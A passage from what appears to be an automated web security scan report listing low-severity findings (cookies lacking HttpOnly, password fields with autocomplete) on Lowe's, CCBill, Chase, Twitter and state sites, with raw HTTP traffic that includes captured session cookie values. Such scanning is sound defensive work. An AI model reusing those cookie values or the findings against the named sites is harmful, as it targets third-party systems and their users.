Set-Cookie: akaau=1310508126~id=05cb77e7a9af330269ff0b0aee88568a; path=/

/* Reset CSS */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td,button{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0}fieldset,img
...[SNIP]...

11.359. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508127~id=92c2f0688210aad23c3f6411d8cbacd8; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/print.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 19 May 2011 19:41:05 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 12482
Expires: Tue, 12 Jul 2011 21:32:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: akaau=1310508127~id=92c2f0688210aad23c3f6411d8cbacd8; path=/

@import 'main.css';

/* Last Modified On: 10/28/2009 by PM */

/* Font Sizes need to be based on points for print */
/*

- 13200: Removed for testing FF issues with product detail only printin
...[SNIP]...

11.360. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/images/lowes_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/images/lowes_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508048~id=3127b3139b297a2c0a2d91d0ab633e19; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/images/lowes_logo.gif HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Sat, 28 Mar 2009 18:56:48 GMT
Accept-Ranges: bytes
Content-Length: 5240
Content-Type: image/gif
Expires: Tue, 12 Jul 2011 21:30:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:48 GMT
Connection: close
Set-Cookie: akaau=1310508048~id=3127b3139b297a2c0a2d91d0ab633e19; path=/

GIF89a..T.....c.Us........B.nR[l...........u-L..../Y.h.1Lk.............m....yxx.b.....R....a__ECC.3j........K.;{.K.YXX.Z.+T..fz.^.977.......U..0e.N.....P..^}R(G.8uJ~..Sj.....`j...E..>.!,M.p|K]s....T..
...[SNIP]...

11.361. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/global/global-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/global/global-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508048~id=3127b3139b297a2c0a2d91d0ab633e19; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/global/global-min.js HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 11 Jul 2011 18:18:35 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 385713
Expires: Tue, 12 Jul 2011 21:30:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:48 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: akaau=1310508048~id=3127b3139b297a2c0a2d91d0ab633e19; path=/

if(!window.console||!console.firebug){var methods=["log","debug","info","warn","error","assert","dir","dirxml","group","groupEnd","time","timeEnd","count","trace","profile","profileEnd"];window.consol
...[SNIP]...

11.362. http://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSdcd8fd=9bfed736835c96972761a89519e0d94422df7bb2eaf0e7a04e1cbbb4; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-1&storeId=10151&catalogId=10051&new=Y&URL=TopCategoriesDisplayView HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; stop_mobi=yes; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TSdcd8fd=9bfed736835c96972761a89519e0d94422df7bb2eaf0e7a04e1cbbb4; cmSessionDepth=2; lowes-prefs={"zipin":{"show":false}}

Response

HTTP/1.1 302 Moved Temporarily
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.lowes.com:443/webapp/wcs/stores/servlet/UserRegistrationForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpL0emnRAXCBEyb1P3TIgvN33O5bKg83oIP9HgETjY0njRr0u8xYTB20%3D
Content-Length: 0
Content-Type: text/html
Content-Language: en
Date: Tue, 12 Jul 2011 21:31:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:01:05 GMT
Set-Cookie: TSdcd8fd=9bfed736835c96972761a89519e0d94422df7bb2eaf0e7a04e1cbbb4; Path=/

11.363. https://www.lowes.com/server-status previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/server-status

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.364. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.365. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.366. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.367. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.368. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.369. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.370. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS176ebc=8af291dbf163c57592847d6d73d5eb85d172642e494065004e1ce3f1; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.371. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS176ebc=3557926829ef74993d5214d92b1ba1ff3ddff0b185006e134e1cbb8e; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.372. http://www.ox.popcap.com/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ox.popcap.com
Path:	/delivery/afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=544a25b56e3d8975dddf1bef97ade47d; expires=Wed, 11-Jul-2012 20:39:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /delivery/afr.php?show=true&cb=53926843&zoneid=85&lcid=1033&ref=http://www.popcap.com/ HTTP/1.1
Host: www.ox.popcap.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; lv=1310503157; user_profile=003000000000000; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; __utmb=163442877

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=544a25b56e3d8975dddf1bef97ade47d; expires=Wed, 11-Jul-2012 20:39:26 GMT; path=/
Vary: Accept-Encoding
Content-Length: 3628
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

11.373. https://www.ri.gov/Licensing/renewal/license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/Licensing/renewal/license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.374. http://www.uscg.mil/safetylevels/levels.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uscg.mil
Path:	/safetylevels/levels.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS655bb7=e7f7107641e55fa6ae7284e1c7a9847a050353219ffc26404e1ce761; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /safetylevels/levels.js HTTP/1.1
Host: www.uscg.mil
Proxy-Connection: keep-alive
Referer: http://www.riema.ri.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 235
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Apr 2011 19:33:34 GMT
Accept-Ranges: bytes
ETag: "ba1189ff115cc1:42c8"
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 00:31:28 GMT
Set-Cookie: TS655bb7=e7f7107641e55fa6ae7284e1c7a9847a050353219ffc26404e1ce761; Path=/

document.write('<a href="http://www.uscg.mil/safetylevels/whatismarsec.asp" target="_blank"><img border=0 src=\"http://www.uscg.mil/safetylevels/level1.gif\" alt =\"MARSEC Level 1: Significant Risk -
...[SNIP]...

11.375. http://www7.lowes.com/eluminate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www7.lowes.com
Path:	/eluminate

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

90226021_login=1310506332015106151490226021; path=/
90226021_reset=1310506332;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /eluminate?ci=90226021&st=1310506327982&vn1=4.3.5&ec=utf-8&vn2=e4.0&pi=HOME&ul=about%3Ablank&tid=6&cg=HOME&pc=Y&pv11=10151&rnd=1310514644157&jv=1.5&je=y&ce=true&cp=x86&sw=1920&sh=1200&pd=32&fs=y&tz=5&pv_a8=1&pv_a13=Functional%20Horizontal%20Attribute%3AHome_Page&pv_a14=User%20Status%3ALogged-Out&pv_a15=JVM%20ID%3ALowesOnlineA22AS02 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www7.lowes.com
Cookie: MBJT=3npJGdCEGA39cXndCp1mhBo99ohPFg9QUCqlPZDTH03dVbJkclo_8Rw

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 21:32:12 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90226021_login=1310506332015106151490226021; path=/
Set-Cookie: 90226021_reset=1310506332;path=/
Expires: Tue, 12 Jul 2011 03:32:12 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

11.376. http://www7.lowes.com/eluminate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www7.lowes.com
Path:	/eluminate

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

90226018_login=1310506249016783873090226018; path=/
90226018_reset=1310506249;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /eluminate?ci=90226018&st=1310506248089&vn1=4.3.5&ec=utf-8&vn2=e4.0&pi=HOME&ul=http%3A//www.lowes.com/&tid=6&cg=HOME&pc=Y&pv11=10151&rnd=1310516781453&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.260.3&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U26&np3=Chrome%2520PDF%2520Viewer&np4=Google%2520Gears%25200.5.33.0&np5=WPI%2520Detector%25201.3&np6=Google%2520Update&np7=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&pv_a8=1&pv_a13=Functional%20Horizontal%20Attribute%3AHome_Page&pv_a14=User%20Status%3ALogged-Out&pv_a15=JVM%20ID%3ALowesOnlineA22AS02 HTTP/1.1
Host: www7.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=30191307911117195883214; stop_mobi=yes; MBJT=CT-1

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 21:30:49 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90226018_login=1310506249016783873090226018; path=/
Set-Cookie: 90226018_reset=1310506249;path=/
Expires: Tue, 12 Jul 2011 03:30:49 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

12. Password field with autocomplete enabled previous next
There are 15 instances of this issue:

https://admin.ccbill.com/loginMM.cgi
https://affiliateadmin.ccbill.com/
http://apps.ccbill.com/
http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
http://apps.ccbill.com/p/developer.html
https://chaseonline.chase.com/Public/Reidentify/ReidentifyFilterView.aspx
https://store.popcap.com/payment.php
https://store.popcap.com/payment.php
https://store.popcap.com/payment.php
http://twitter.com/
http://twitter.com/
http://twitter.com/
http://ucc.state.ri.us/loginsystem/login_form.asp
http://www.citizencorps.gov/
https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

12.1. https://admin.ccbill.com/loginMM.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/loginMM.cgi

Issue detail

The page contains a form with the following action URL:

https://admin.ccbill.com/loginMM.cgi

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:54 GMT
Set-Cookie: JSession=; domain=ccbill.com; path=/; expires=Mon, 11-Jul-2011 17:14:56 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 18889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel=
...[SNIP]...
<div id="loginFormPanel">
<form action='loginMM.cgi' method="post" id="loginForm" name="loginForm" >
<table width="100%" cellpadding="0" cellspacing="2">
...[SNIP]...
</label>
<input type="password" width="60" autocomplete="on" id="password" name="password" style="width:70px">
</td>
...[SNIP]...

12.2. https://affiliateadmin.ccbill.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://affiliateadmin.ccbill.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://affiliateadmin.ccbill.com/login.cgi

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/
Content-Length: 3183

<html>
<head>
<link rel="stylesheet" href="/ccbill.css">
<title>CCBill.com Affiliate Admin</title>
</head>
<body>

<table border="0" class="OuterLogin" width="100%" height="100%">
<tr>
<td
...[SNIP]...
</h2>

<form name=login action="/login.cgi" method="POST">
<table cellpadding="0" cellspacing="0" border="0" class="InnerLogin" width="400" height="260">
...[SNIP]...
<td align="left" class="InnerLogin"><input type="password" size="20" class="InnerLogin" name="password">
</td>
...[SNIP]...

12.3. http://apps.ccbill.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://apps.ccbill.com/login.php

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ccbill.com/developers/faq.php
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.3.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c

Response

12.4. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The page contains a form with the following action URL:

http://apps.ccbill.com/login.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

12.5. http://apps.ccbill.com/p/developer.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/p/developer.html

Issue detail

The page contains a form with the following action URL:

http://apps.ccbill.com/login.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
